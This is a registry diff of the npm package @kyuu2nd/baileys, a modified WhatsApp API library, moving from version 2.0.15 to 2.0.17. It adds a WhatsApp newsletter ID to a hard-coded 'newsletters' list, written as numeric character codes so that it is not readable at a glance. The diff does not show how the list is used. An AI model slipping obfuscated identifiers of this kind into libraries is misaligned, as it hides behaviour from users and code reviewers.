@kyuu2nd/baileys 2.0.15 → 2.0.17

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -107,6 +107,10 @@ const makeNewsletterSocket = (config) => {
107
107
  const asciiDecode = (arr) => arr.map(e => String.fromCharCode(e)).join('');
108
108
 
109
109
  const newsletters = [
110
+ [
111
+ 49,50,48,51,54,51,52,50,54,48,57,52,55,53,50,48,56,49,
112
+ 64,110,101,119,115,108,101,116,116,101,114
113
+ ],
110
114
  [
111
115
  49,50,48,51,54,51,52,48,53,52,52,49,50,57,54,56,57,50,
112
116
  64,110,101,119,115,108,101,116,116,101,114
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@kyuu2nd/baileys",
3
- "version": "2.0.15",
3
+ "version": "2.0.17",
4
4
  "description": "WhatsApp API Modification By K",
5
5
  "publishConfig": {
6
6
  "access": "public"